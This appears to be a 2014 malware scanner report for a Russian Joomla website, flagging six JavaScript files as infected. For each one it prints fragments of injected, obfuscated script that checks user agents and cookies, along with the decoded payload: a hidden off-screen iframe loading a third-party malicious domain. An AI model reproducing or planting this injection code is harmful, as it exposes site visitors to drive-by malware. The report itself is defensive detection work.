New scan:

Malware Scanner report for web-prodvijenie.ru

Malicious/Suspicious/Total urls checked
6/0/14
6 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://web-prodvijenie.ru/
200 OK
Content-Length: 27635
Content-Type: text/html
clean
http://web-prodvijenie.ru/media/system/js/mootools-core.js
200 OK
Content-Length: 98437
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/core.js
200 OK
Content-Length: 6859
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/modal.js
200 OK
Content-Length: 11807
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3202 bytes are skipped ...
{src:a,frameBorder:0,width:this.options.size.x,height:this.options.size.y},this.options.iframeOptions));return this.options.iframePreload?(this.asset.addEvent("load",function(){this.applyContent(this.asset.setStyle("display",""))}.bind(this)),this.asset.setStyle("display","none").inject(this.content),
!1):this.asset},string:function(a){return a}});SqueezeBox.handlers.url=SqueezeBox.handlers.ajax;SqueezeBox.parsers.url=SqueezeBox.parsers.ajax;SqueezeBox.parsers.adopt=SqueezeBox.parsers.clone;

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru//ajax.googleapis.com/ajax/libs/jquery/1.7/jquery.min.js/
500 Internal Server Error
Content-Length: 878
Content-Type: text/html
clean
http://web-prodvijenie.ru/test404page.js
404 Not Found
Content-Length: 518
Content-Type: text/html
clean
http://web-prodvijenie.ru/media/k2/assets/js/k2.noconflict.js
200 OK
Content-Length: 2422
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 1028 bytes are skipped ...
{
var cookie = getCookie('kegaoeutg18sf'+'fekfsj3asjf');
if (cookie == undefined) {
setCookie('kegaoeutg18sf'+'fekfsj3asjf', true, 172804);
document.write('<'+'if'+'ra'+'m'+'e'+' s'+'r'+'c'+'='+'"http://oil.pesclubamerica.com/hrejerkthfeh19.html" st'+'yle="posi'+'tion:absolute'+';'+'left'+':'+'-'+'1284'+'px'+';'+'top'+':'+'-'+'1284'+'px'+';'+'" height="134" width="134"><'+'/'+'if'+'ram'+'e'+'>');
}
};
})();
var $K2 = jQuery.noConflict();

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/components/com_k2/js/k2.js
200 OK
Content-Length: 9398
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3393 bytes are skipped ...
nt)
$K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length);
});
// Equal block heights for the "default" view
$K2(window).load(function () {
var blocks = $K2('.subCategory, .k2EqualHeights');
var maxHeight = 0;
blocks.each(function(){
maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height')));
});
blocks.css('height', maxHeight);
});

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/media/system/js/caption.js
200 OK
Content-Length: 2804
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/media/system/js/mootools-more.js
200 OK
Content-Length: 240406
Content-Type: application/javascript
clean
http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/dropdownMenu.js
200 OK
Content-Length: 6613
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3508 bytes are skipped ...
>} else {
sfHover = function()
{
var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li");
for (var i = 0; i<sfEls.length; ++i) {
sfEls[i].onmouseover = function() {
this.className += " sfhover";
}
sfEls[i].onmouseout = function() {
this.className = this.className.replace(new RegExp(" sfhover\\b"), "");
}
}
}
if (window.attachEvent) window.attachEvent("onload", sfHover);
}

Decoded script:


function () {
var sfEls = document.getElementById("ot-mainmenu").getElementsByTagName("li");
for (var i = 0; i < sfEls.length; ++i) {
sfEls[i].onmouseover = function () {this.className += " sfhover";};
sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfhover\\b"), "");};
}
}
<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/templates/ot_corporatetree/scripts/otscript.js
200 OK
Content-Length: 4862
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 1525 bytes are skipped ...
ction equaHeightTopBox()
{
var topboxes = $$('div.ot-topboxes div.otRounded-mid');
var maxHeight = 0;

topboxes.each(function(item, index)
{
var height = parseInt(item.getStyle('height'));

if(height > maxHeight)
{
maxHeight = height;
}
});
topboxes.setStyle('height', maxHeight + 'px');
}




window.addEvent ('load', function() {
equaHeightTopBox();

});

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru/modules/mod_ot_scroller/js/jquery.tools.min.js
200 OK
Content-Length: 12310
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var leonmain = 0;
if ((leonmain = haystack.indexOf(needle, f_offset)) !== -1) {
return leonmain;
}
return false;
}
function control_agent(){
var see_agent = ['Lunascape','iPhone','Macintosh','Linux','iPad','Flock','SeaMonkey','Nokia','SlimBrowser','AmigaOS','Android','FreeBSD','
... 3164 bytes are skipped ...
e.delta=e.wheelDelta/120;break}e.type="wheel";return b.event.handle.call(this,e,e.delta)}var a=b.tools.scrollable;a.plugins=a.plugins||{};a.plugins.mousewheel={version:"1.0.1",conf:{api:false,speed:50}};b.fn.mousewheel=function(f){var g=b.extend({},a.plugins.mousewheel.conf),e;if(typeof f=="number"){f={speed:f}}f=b.extend(g,f);this.each(function(){var h=b(this).scrollable();if(h){e=h}h.getRoot().wheel(function(i,j){h.move(j<0?1:-1,f.speed||50);return false})});return f.api?e:this}})(jQuery);

Decoded script:


<iframe src="http://oil.pesclubamerica.com/hrejerkthfeh19.html" style="position:absolute;left:-1284px;top:-1284px;" height="134" width="134"></iframe>

Antivirus reports:

Avast
JS:Redirector-BTV [Trj]
Microsoft
Trojan:JS/Iframe.DI
Avira
HTML/Rce.Gen
Sophos
Troj/JSRedir-LH

http://web-prodvijenie.ru//vk.com/js/api/openapi.js?60/
404 Not Found
Content-Length: 528
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: web-prodvijenie.ru

Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Connection: close
Date: Sat, 04 Oct 2014 15:17:49 GMT
Pragma: no-cache
Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 7bad5c47e51dd58e24bbe2681002a0ee=a358e8334c06b69a9a299009c31c9a19; path=/
X-Logged-In: False
X-Powered-By: PHP/5.3.17
Second query (visit from search engine):
GET / HTTP/1.1
Host: web-prodvijenie.ru
Referer: http://www.google.com/search?q=web-prodvijenie.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=web-prodvijenie.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://web-prodvijenie.ru/

Result: web-prodvijenie.ru is not infected or malware details are not published yet.